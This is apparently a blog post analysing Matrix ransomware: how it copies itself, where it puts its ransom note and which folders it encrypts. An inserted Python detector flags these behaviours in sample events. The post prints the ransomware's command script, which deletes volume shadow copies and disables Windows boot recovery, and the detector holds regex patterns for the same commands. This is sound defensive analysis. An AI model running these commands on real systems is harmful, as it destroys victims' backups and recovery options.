Wednesday, April 26, 2017

Ransomware Matrix Analysis

Matrix

I observed that the EITest campaign redirected to RigEK, which dropped Matrix.
BleepingComputer classifies this sample as Version 3.
Please refer to the following Web site.

Cannot analyze with Cuckoo

In malwr's analysis report it was displayed as follows.
Maybe Cuckoo's function hooks were modified by Matrix.
Sorry, I have not found that code yet.
Also, I could not analyze it in my own sandbox (Cuckoo 2.0.1).



Behavior

Memory writes and child process creation

Matrix writes code into memory.
One of the written images is packed with UPX.


The Matrix executable creates a copy of itself with a random name in the following folders.
%APPDATA%\MICROS~1\[random].exe
%APPDATA%\[random]\[random].exe
%LOCALAPPDATA%\MICROS~1\
%TEMP%\[random].exe
%TEMP%

Then, the copy is executed as a child process.
Parent and child have the same hash.
Files under the following paths are deleted after encryption.
%APPDATA%\MICROS~1\[random].exe
%APPDATA%\[random]\[random].exe
%LOCALAPPDATA%\MICROS~1\
%TEMP%\[random].exe

Executed commands

Matrix deletes the volume shadow copies using a cmd.exe command.
It also disables Startup Repair (Windows Recovery Environment) at boot time, so a damaged system will not enter recovery automatically.

%APPDATA%\[random].cmd
echo vlc091eFKxql4VW4M
ping -n 6 localhost
wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
echo vlc091eFKxql4VW4M
ping -n 3 localhost
cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
ping -n 3 localhost
echo vlc091eFKxql4VW4Mg

Hybrid-analysis.com's report shows the child process execution parameters of Matrix.



This value is sent to the external server together with a status.



Show ransom note

It registers an HTA ransom note in the user's Startup folder, so the note is shown at every logon.
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta
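As an added detection example (this code is not from the original post), the following Python flags the three host behaviours described above: a child process launched from one of the self-copy paths with the same hash as its parent, the vssadmin/bcdedit recovery-tampering command line (including the wmic.exe wrapper), and an .hta written to the Startup folder. The event shapes follow Sysmon Event ID 1 and Event ID 11 field names; the sample events, GUIDs and every hash value are constructed placeholders, not captured data.

```python
"""Added example (not code from the original post): flag the Matrix behaviours
described above in constructed Sysmon-style events. Field names follow Sysmon
Event ID 1 (process create) and Event ID 11 (file create); the events and every
hash value below are constructed placeholders, not captured data."""
import re

# Self-copy locations from the post (environment variables expanded; the
# match is anchored on the final path components so the profile name does
# not matter). MICROS~1 is the 8.3 short name of the "Microsoft" folder.
SELF_COPY_EXE = re.compile(
    r"\\AppData\\(Roaming\\MICROS~1|Roaming\\[^\\]+|Local\\MICROS~1|Local\\Temp)"
    r"\\[^\\]+\.exe$",
    re.IGNORECASE,
)

# Recovery-tampering commands from the dropped .cmd file, each as a named rule.
RECOVERY_TAMPER = [
    ("vssadmin_delete_shadows",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE)),
    ("bcdedit_recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.IGNORECASE)),
    ("bcdedit_ignore_boot_failures",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.IGNORECASE)),
]
WMIC_SPAWN = re.compile(r"wmic(\.exe)?\s+process\s+call\s+create", re.IGNORECASE)

# HTA written to the per-user Startup folder.
STARTUP_HTA = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.hta$", re.IGNORECASE)


def check_process_event(ev, parent_hash):
    """Return the rule names a process-create event trips. parent_hash is the
    Hashes field of the parent's own process-create event (None if unseen)."""
    findings = []
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    # A binary launched from one of the self-copy paths whose hash equals its
    # parent's is the "copy itself, then run the copy" pattern from the post.
    if SELF_COPY_EXE.search(image) and parent_hash and ev.get("Hashes") == parent_hash:
        findings.append("self_copy_child_same_hash")
    for name, pattern in RECOVERY_TAMPER:
        if pattern.search(cmd):
            findings.append(name)
    if WMIC_SPAWN.search(cmd) and "cmd.exe" in cmd.lower():
        findings.append("wmic_spawns_cmd")
    return findings


def check_file_event(ev):
    """Return the rule names a file-create event trips."""
    return ["startup_hta_dropped"] if STARTUP_HTA.search(ev.get("TargetFilename", "")) else []


def scan(events):
    """Walk events in order, joining each child to its parent's hash by ProcessGuid.
    Returns a list of (path, [rule names]) for every event that tripped a rule."""
    hashes_by_guid = {}
    results = []
    for ev in events:
        if ev.get("EventID") == 1:
            hashes_by_guid[ev["ProcessGuid"]] = ev.get("Hashes")
            found = check_process_event(ev, hashes_by_guid.get(ev.get("ParentProcessGuid")))
            path = ev.get("Image", "")
        elif ev.get("EventID") == 11:
            found = check_file_event(ev)
            path = ev.get("TargetFilename", "")
        else:
            continue
        if found:
            results.append((path, found))
    return results


# Constructed sample events: a dropper, its self-copy, the wmic-launched cmd,
# the Startup HTA, and one benign process that must not be flagged.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{P1}", "ParentProcessGuid": "{P0}",
     "Image": r"C:\Users\user\Downloads\invoice.exe",
     "CommandLine": r"C:\Users\user\Downloads\invoice.exe",
     "Hashes": "SHA256=PLACEHOLDER_SAMPLE_HASH"},
    {"EventID": 1, "ProcessGuid": "{P2}", "ParentProcessGuid": "{P1}",
     "Image": r"C:\Users\user\AppData\Roaming\MICROS~1\xk3j9.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\MICROS~1\xk3j9.exe",
     "Hashes": "SHA256=PLACEHOLDER_SAMPLE_HASH"},
    {"EventID": 1, "ProcessGuid": "{P3}", "ParentProcessGuid": "{P2}",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic.exe process call create "cmd.exe /c vssadmin.exe delete shadows '
                    '/all /quiet & bcdedit.exe /set {default} recoveryenabled no & '
                    'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"',
     "Hashes": "SHA256=PLACEHOLDER_WMIC_HASH"},
    {"EventID": 11, "ProcessGuid": "{P2}",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\q7z1p.hta"},
    {"EventID": 1, "ProcessGuid": "{P4}", "ParentProcessGuid": "{P0}",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
     "Hashes": "SHA256=PLACEHOLDER_BROWSER_HASH"},
]

if __name__ == "__main__":
    for path, rules in scan(SAMPLE_EVENTS):
        print(path, "->", ", ".join(rules))
```

The parent/child hash join is done by ProcessGuid rather than by image path because the copy and the original have different paths but, as the post notes, the same hash; the vssadmin and bcdedit rules are kept separate so that a single one firing (for example only shadow deletion) is still surfaced.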

Encryption

It recursively encrypts files in the following two folders.
C:\Users\All Users\
C:\Users\user_name\
According to the malware author, files are encrypted with RSA 2048.
Unfortunately, the encryption is still under investigation.


Analysis reports

  • https://malwr.com/analysis/ZWYyY2RiNDFlYzc5NDI2NzkyNWIyYmYxYTUzZmY4NDk/
  • https://www.hybrid-analysis.com/sample/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47

